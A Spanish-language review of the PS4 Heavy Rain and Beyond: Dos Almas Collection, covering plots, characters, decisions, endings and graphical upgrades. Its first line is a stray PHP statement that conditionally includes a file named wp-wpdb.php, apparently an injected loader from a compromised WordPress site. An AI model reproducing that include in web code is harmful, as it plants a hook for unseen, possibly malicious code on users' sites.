if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Heavy Rain y Beyond Dos Almas Collection – La Fortaleza de LeChuck

Análisis Heavy Rain y Beyond Dos Almas Collection

Heavy Rain y Beyond: Dos Almas son dos juegos que vieron la luz por primera vez en PS3 y que, como muchos otros, han dado el salto a PS4 con un ligero lavado de cara. Ambos han sido desarrollados por Quantic Dream, un estudio conocido anteriormente por juegos como Fahrenheit. El pack Heavy Rain y Beyond Dos Almas Collection te ofrece la oportunidad de jugar por primera vez o rejugarlos en tu PS4, pero vamos a ver qué ha cambiado.

Heavy-Rain-Beyond-Dos-Almas-Collection

Quantic Dream es un estudio especializado en aventuras interactivas donde el jugador debe dirigir a varios personajes y tomar una serie de decisiones que cambiará el destino de los personajes involucrados. También son habituales los quick time event (QTE) y algunos puzles. En 2010 el estudio lanzó Heavy Rain, un thriller psicológico que sorprendió tanto por su buena historia como por su curiosa jugabilidad y mecánicas en base a decisiones y QTE que fueron alabadas por unos y criticadas duramente por otros, además, fue uno de esos momentos en el que la comunidad se preguntó si realmente era un videojuego. Sin embargo, la compañía ya apostó por esta fórmula en Fahrenheit (2005) que también recibió buenas críticas por su trama. Después del éxito de Heavy Rain, en 2013 aterrizó Beyond Dos Almas y nos mostró un nuevo drama interactivo con tintes paranormales.

Primeramente vamos a centrarnos en el primer juego del pack, Heavy Rain, el cual da inicio mostrándonos la tranquila vida de Ethan Mars, un arquitecto que vive junto a esposa y sus dos hijos en una lujosa casa. Sin embargo, su vida da un giro cuando uno de sus hijos muere atropellado, lo que ocasiona el fin de su matrimonio y el comienzo de sus trastornos mentales. Por otro lado, el juego nos cuenta la historia del asesino del origami, un despiadado sujeto que asesina niños y deja sobre su cuerpo una paloma de papel y una orquídea. La desgracia de Ethan no termina aquí, ya que un tiempo después Shaun desaparece.

Heavy-Rain-Beyond-Dos-Almas-Collection-1

Durante el juego tendremos el control sobre 4 personajes: Ethan, el desdichado padre; Madison Paige, una periodista que sufre de insomnio; Norman Jayden, un agente del FBI adicto a la droga y Scott Shelby, un detective privado que investiga el caso del asesino del origami. Todos ellos estarán relacionados de cierta forma con el asesino en serie y nos permitirán ver la trama desde diferentes perspectivas. A través de estos implicados, tomaremos numerosas decisiones de menor y mayor importancia que marcarán el desarrollo de la trama hasta el final, e incluso su propio destino. Una mala decisión o reaccionar tarde a un QTE se paga caro, y puede hacer que un personaje fallezca y precipitarnos hasta uno de los desenlaces, ya que Heavy Rain tiene diferentes finales: hay 18 posibles epílogos divididos en 7 finales. Vamos, que sacaros el platino os costará un poco.

El juego, además de la estupenda trama, destaca por su potente ambientación. La incesante lluvia, los colores apagados y la música trasmite una profunda melancolía y hace que el jugador tenga una conexión más cercana con las miserables vidas de los personajes y el tremendo caso del origami. La soledad y la desgracia son latentes en cada episodio hasta el final y solo nuestras acciones determinarán el nivel de angustia.

El otro juego que incluye la colección es Beyond: Dos Almas, un título protagonizado por Ellen Page y Willem Dafoe. En él tomamos el papel de Jodie, una chica que desde que vino al mundo ha estado acompañada por Aiden, un ser incorpóreo que la protege y ayuda. El juego nos muestra la vida de Jodie desde pequeña hasta adulta y los problemas a los que se enfrenta al ser un conejillo de indias de la CIA, la cual la utiliza para sus fines. A lo largo de esta aventura por la vida de nuestra protagonista descubriremos por qué Aiden está tan unido a ella y el secreto de su origen.

Heavy-Rain-Beyond-Dos-Almas-Collection-2

La trama es una mezcla de los recuerdos de Jodie, de los momentos felices y amargos para crear una conexión con el jugador con cada fragmento importante que la marcaron desde su etapa de niña, pasando por la adolescencia hasta alcanzar la edad adulta. Se ha buscado huir de la linealidad mezclando épocas y momentos para que en nuestra cabeza construyamos una la línea temporal, por lo tanto, a menudo veremos cambios en Jodie que serán explicados en algún momento de la historia. También tomaremos en control de Aiden y, mediante sus habilidades, podremos levantar objetos y poseer personas para utilizarlas a nuestro antojo.

La fórmula de Quantic Dream se mantiene intacta con numerosas decisiones y QTE pero en esta ocasión se han introducido mejoras para las escenas de acción y ahora se ralentizará el tiempo para que el jugador pueda pensar cuál será su propio movimiento, haciendo que las peleas se resuelvan de forma más natural. Por otro lado, el personaje se mueve de forma más real y es más fácil controlarlo y girar con él.

En cuanto a la ambientación de Beyond: Dos Almas, es menos oscura que el titulo anterior y viajaremos a diferentes localizaciones con paisajes espectaculares.

En el apartado gráfico, ambas aventuras han experimentado mejoras pero las animaciones continúan igual y es donde más se nota el paso del tiempo. Estas son las mejoras que ha experimentado Heavy Rain y Beyond Dos Almas Collection en PS4:

• Aumento de la resolución de 720p a 1080p.
  • Aumento de los mapeados de sombras disponibles de 8 a 12.
  • Renderizado multithread habilitado.
  • Efectos de posy procesamiento añadidos: oclusión ambiental de alta definición y antialiasing multimuestra.
  • Iluminación mejorada de escenarios y objetos.
  • Reflejos mejorados.

Si comparamos ambos juegos, Beyond: Dos Almas es posiblemente menos complejo, no tiene tantas decisiones trascendentales ni dispone de tantos finales pero aún así la trama está correctamente construida y tiene momentos impactantes que provocan que no se pierda la atención del jugador.

En definitiva, Heavy Rain y Beyond Dos Almas Collection incluye dos juegos ideales para tumbarse relajadamente en el sofá y disfrutar de la trama, son juegos sencillos donde la mayor dificultad reside en el dilema moral que se nos plantea en determinados momentos. Muy recomendables para jugar en compañía e ir pasándose el mando, o para introducir en el hobby a gente no muy experimentada con los videojuegos.